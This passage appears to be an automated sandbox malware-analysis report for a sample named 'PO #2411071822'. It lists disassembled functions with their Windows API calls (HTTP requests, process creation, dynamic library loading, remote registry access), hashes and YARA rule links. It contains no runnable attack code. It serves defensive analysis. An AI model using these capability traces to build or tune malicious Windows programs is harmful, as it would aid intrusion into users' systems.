                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                              • Opcode ID: 2ede0fe2debe153f07c744abe2a53372efe5f11be0beb6d5dba581ef7606374c
                                                                                                              • Instruction ID: 564b3be1733266526f2702b1480400d56197bf2aa77215d04538611749b5c324
                                                                                                              • Opcode Fuzzy Hash: 2ede0fe2debe153f07c744abe2a53372efe5f11be0beb6d5dba581ef7606374c
                                                                                                              • Instruction Fuzzy Hash: D52101B2E00108BFDB05AB65C886AFF777CDF45754B10422AF021A61E0DBB80D4686A8
                                                                                                              Function 003E51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 003E522F
                                                                                                              • _wcscpy.LIBCMT ref: 003E5283
                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003E5293
                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00453CB0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                              • String ID: Line:
                                                                                                              • API String ID: 1053898822-1585850449
                                                                                                              • Opcode ID: c79e85b69dfc82956624338ad07d730147e9c0c8253ec2a60de13e52c27196ad
                                                                                                              • Instruction ID: fe0bdf68ddfa66052e2d60d9655c7c6729b571449524afae445bb7de35c04e05
                                                                                                              • Opcode Fuzzy Hash: c79e85b69dfc82956624338ad07d730147e9c0c8253ec2a60de13e52c27196ad
                                                                                                              • Instruction Fuzzy Hash: 0831F5714083A06FC722EB51DC42FDF7BD8AF45344F00462EF5859A0E2EB74A648CB9A
                                                                                                              Function 004343E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00434401
                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00434427
                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00434457
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0043449E
                                                                                                                • Part of subcall function 00435052: GetLastError.KERNEL32(?,?,004343CC,00000000,00000000,00000001), ref: 00435067
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1951874230-3916222277
                                                                                                              • Opcode ID: eca22f20997eb29a34eaf4aebe80d71158b57a3bb1910e0f44a6085c25042053
                                                                                                              • Instruction ID: 2ebce583cca25d2dbe8338ede9aa8a82f64fe7ed0bee03ddeb8f97338a03a14e
                                                                                                              • Opcode Fuzzy Hash: eca22f20997eb29a34eaf4aebe80d71158b57a3bb1910e0f44a6085c25042053
                                                                                                              • Instruction Fuzzy Hash: B421B0B1A00208BFE7119F95CC85EFB76FCEB9C758F10942BF10592240EA69AD05977A
                                                                                                              Function 004490E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003FD1BA
                                                                                                                • Part of subcall function 003FD17C: GetStockObject.GDI32(00000011), ref: 003FD1CE
                                                                                                                • Part of subcall function 003FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0044915C
                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00449163
                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00449178
                                                                                                              • DestroyWindow.USER32(?), ref: 00449180
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                              • String ID: SysAnimate32
                                                                                                              • API String ID: 4146253029-1011021900
                                                                                                              • Opcode ID: 82a48a23b89c09b6f97e6b4b7f33b5344ddc23e8629b69cdcdadcc12b3107855
                                                                                                              • Instruction ID: 8be8975beb4264351d4a02715e2aa6bd6a6504032666fd81d419d9829844e017
                                                                                                              • Opcode Fuzzy Hash: 82a48a23b89c09b6f97e6b4b7f33b5344ddc23e8629b69cdcdadcc12b3107855
                                                                                                              • Instruction Fuzzy Hash: A0219F71600606BBFF208E64DC89EBB37ADEF99364F10462AF91492290D775DC42B768
                                                                                                              Function 00429568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00429588
                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004295B9
                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 004295CB
                                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00429605
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateHandle$FilePipe
                                                                                                              • String ID: nul
                                                                                                              • API String ID: 4209266947-2873401336
                                                                                                              • Opcode ID: 54bf6f4b3041abd22e087493cad2ea94f75adac0b85de60ad3695f0a1eed0399
                                                                                                              • Instruction ID: 1b743b8edf49fe951d141af15d5b1fd04aabfa9a0edcc26a3be9659b2e6b5ba0
                                                                                                              • Opcode Fuzzy Hash: 54bf6f4b3041abd22e087493cad2ea94f75adac0b85de60ad3695f0a1eed0399
                                                                                                              • Instruction Fuzzy Hash: F821B571B00215ABEB119F25EC04A9A77F4AF49324F604A2AFCA1D73D0D774DD81CB58
                                                                                                              Function 00429634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00429653
                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00429683
                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00429694
                                                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004296CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateHandle$FilePipe
                                                                                                              • String ID: nul
                                                                                                              • API String ID: 4209266947-2873401336
                                                                                                              • Opcode ID: e3db845f20821301664e9c3d7cbaf9090ae53dbfb2390963bd0aaeb5fe06f4a5
                                                                                                              • Instruction ID: 5fd82fc33f46e39aaab75560b0d35338cae5ae5147acdb714f59c78dbf1afda5
                                                                                                              • Opcode Fuzzy Hash: e3db845f20821301664e9c3d7cbaf9090ae53dbfb2390963bd0aaeb5fe06f4a5
                                                                                                              • Instruction Fuzzy Hash: 3A21B871B002159BDB109F69AC04E9A77E8AF45734F60061AFCA1D33D0E7B8DC41CB59
                                                                                                              Function 0042DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0042DB0A
                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0042DB5E
                                                                                                              • __swprintf.LIBCMT ref: 0042DB77
                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0047DC00), ref: 0042DBB5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                              • String ID: %lu
                                                                                                              • API String ID: 3164766367-685833217
                                                                                                              • Opcode ID: 6eb48fe2a3a046b9ab3c5a788369cd049d0830cdd04918b87841b152dd0c669c
                                                                                                              • Instruction ID: 30896be45195e0d5d82910ef519ffa452ef05fb6815862bb1ed2fb7bb1d95ec7
                                                                                                              • Opcode Fuzzy Hash: 6eb48fe2a3a046b9ab3c5a788369cd049d0830cdd04918b87841b152dd0c669c
                                                                                                              • Instruction Fuzzy Hash: 2621D635A00118AFCB10EF55DD81EDEBBB8EF49704B10407AF505EB291DB74EA01CB25
                                                                                                              Function 0041C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0041C84A
                                                                                                                • Part of subcall function 0041C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0041C85D
                                                                                                                • Part of subcall function 0041C82D: GetCurrentThreadId.KERNEL32 ref: 0041C864
                                                                                                                • Part of subcall function 0041C82D: AttachThreadInput.USER32(00000000), ref: 0041C86B
                                                                                                              • GetFocus.USER32 ref: 0041CA05
                                                                                                                • Part of subcall function 0041C876: GetParent.USER32(?), ref: 0041C884
                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0041CA4E
                                                                                                              • EnumChildWindows.USER32(?,0041CAC4), ref: 0041CA76
                                                                                                              • __swprintf.LIBCMT ref: 0041CA90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                              • String ID: %s%d
                                                                                                              • API String ID: 3187004680-1110647743
                                                                                                              • Opcode ID: cdb11bb4910586cf1e9be0761e9305baa2947a7ccbd63324244c9c4be5f0b246
                                                                                                              • Instruction ID: 57574b009a755d5838aefdf9600822a25f5b50ea14cf2db22e235504bc65009f
                                                                                                              • Opcode Fuzzy Hash: cdb11bb4910586cf1e9be0761e9305baa2947a7ccbd63324244c9c4be5f0b246
                                                                                                              • Instruction Fuzzy Hash: 6F1175B1A402097BDB12BF518CC6FE937689F54754F00407BFA08AA182DB789585DB79
                                                                                                              Function 00407A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __lock.LIBCMT ref: 00407AD8
                                                                                                                • Part of subcall function 00407CF4: __mtinitlocknum.LIBCMT ref: 00407D06
                                                                                                                • Part of subcall function 00407CF4: EnterCriticalSection.KERNEL32(00000000,?,00407ADD,0000000D), ref: 00407D1F
                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00407AE5
                                                                                                              • __lock.LIBCMT ref: 00407AF9
                                                                                                              • ___addlocaleref.LIBCMT ref: 00407B17
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                              • String ID: `F
                                                                                                              • API String ID: 1687444384-3520748611
                                                                                                              • Opcode ID: 469f725970f27f7f67a08e1d03f7767eec8f76efaafe6e3fe7df794067467461
                                                                                                              • Instruction ID: f20e864a79c3960506d5e9c6ec80fe9b1ee9d220a6e1508e04155302a5ef5090
                                                                                                              • Opcode Fuzzy Hash: 469f725970f27f7f67a08e1d03f7767eec8f76efaafe6e3fe7df794067467461
                                                                                                              • Instruction Fuzzy Hash: E7015E71904700DED720DF66C90574ABBF0AF50329F20892FA496A62E0DB78B640CB4A
                                                                                                              Function 0044E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 0044E33D
                                                                                                              • _memset.LIBCMT ref: 0044E34C
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004A3D00,004A3D44), ref: 0044E37B
                                                                                                              • CloseHandle.KERNEL32 ref: 0044E38D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                                              • String ID: D=J
                                                                                                              • API String ID: 3277943733-1949506622
                                                                                                              • Opcode ID: e6194e97eca0abc2227e8886355004563642f7f54ecacf82418722c91b2b2eb1
                                                                                                              • Instruction ID: 626050d6b65f4eae53e3c203df50cd55a323ac56ad41d9a88ddee3ceda5f6565
                                                                                                              • Opcode Fuzzy Hash: e6194e97eca0abc2227e8886355004563642f7f54ecacf82418722c91b2b2eb1
                                                                                                              • Instruction Fuzzy Hash: 95F0D0B1640314BAF2106F65AC46F777E5CDB06756F004432FE05E61A2E7799D1046BD
                                                                                                              Function 00441945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004419F3
                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00441A26
                                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00441B49
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00441BBF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2364364464-0
                                                                                                              • Opcode ID: 16f1e0514e2fa364cccd54bbb48dfa0f68eab92aef8ebba5e815150408febfe0
                                                                                                              • Instruction ID: 375af491a8e5f0ab807f3f1fe578ca46d1b6893b93d38bab802a39ca92044680
                                                                                                              • Opcode Fuzzy Hash: 16f1e0514e2fa364cccd54bbb48dfa0f68eab92aef8ebba5e815150408febfe0
                                                                                                              • Instruction Fuzzy Hash: B9815270A00214EBDF119F64C886BAEBBE5EF04710F14845AFA05AF3D2D7B9E9418B95
                                                                                                              Function 0044E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0044E1D5
                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0044E20D
                                                                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 0044E248
                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0044E269
                                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0044E281
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188977179-0
                                                                                                              • Opcode ID: 8dc7cf23289ef7f74a04f7a5366dd8bc14c548c4f617b633078d3c19d6039ebd
                                                                                                              • Instruction ID: 42cc20ffd389e9671a46079718ea138119c518df76bdda6c5b27d40ae48dae5c
                                                                                                              • Opcode Fuzzy Hash: 8dc7cf23289ef7f74a04f7a5366dd8bc14c548c4f617b633078d3c19d6039ebd
                                                                                                              • Instruction Fuzzy Hash: 6F61A334A40214AFEB25CF5AC854FBB77BABF49300F08406AF955973A1C7B9A940CB19
                                                                                                              Function 00421C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VariantInit.OLEAUT32(?), ref: 00421CB4
                                                                                                              • VariantClear.OLEAUT32(00000013), ref: 00421D26
                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 00421D81
                                                                                                              • VariantClear.OLEAUT32(?), ref: 00421DF8
                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00421E26
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                                                              • String ID:
                                                                                                              • API String ID: 4136290138-0
                                                                                                              • Opcode ID: 2292958261dfdb0a106e78ee9430c243b12063d3bfd051f061cfb1f5cce47085
                                                                                                              • Instruction ID: 12a19a4590e0db629b16b14601d4ebf0ff33bc77961ec283e1f5d96ac714cc7f
                                                                                                              • Opcode Fuzzy Hash: 2292958261dfdb0a106e78ee9430c243b12063d3bfd051f061cfb1f5cce47085
                                                                                                              • Instruction Fuzzy Hash: 4E5169B5A00219EFCB14CF58D880AAAB7B9FF5C314B15855AED49DB310E734EA11CFA4
                                                                                                              Function 00440688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004406EE
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0044077D
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044079B
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004407E1
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 004407FB
                                                                                                                • Part of subcall function 003FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0042A574,?,?,00000000,00000008), ref: 003FE675
                                                                                                                • Part of subcall function 003FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0042A574,?,?,00000000,00000008), ref: 003FE699
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 327935632-0
                                                                                                              • Opcode ID: ca92a5cf832c327b59a38207629c0ab407dade9eef55a36c8965456b7f5f0b98
                                                                                                              • Instruction ID: b679b4f5dd40f13ef1bcb5eba25b32979dcd5862a84da179c76ccf41a5be3441
                                                                                                              • Opcode Fuzzy Hash: ca92a5cf832c327b59a38207629c0ab407dade9eef55a36c8965456b7f5f0b98
                                                                                                              • Instruction Fuzzy Hash: 9D519D75A00219DFDB01EFA8C481DADB7B5BF49310B048166EA15AF392DB74ED42CF85
                                                                                                              Function 00442E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00443C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00442EEF
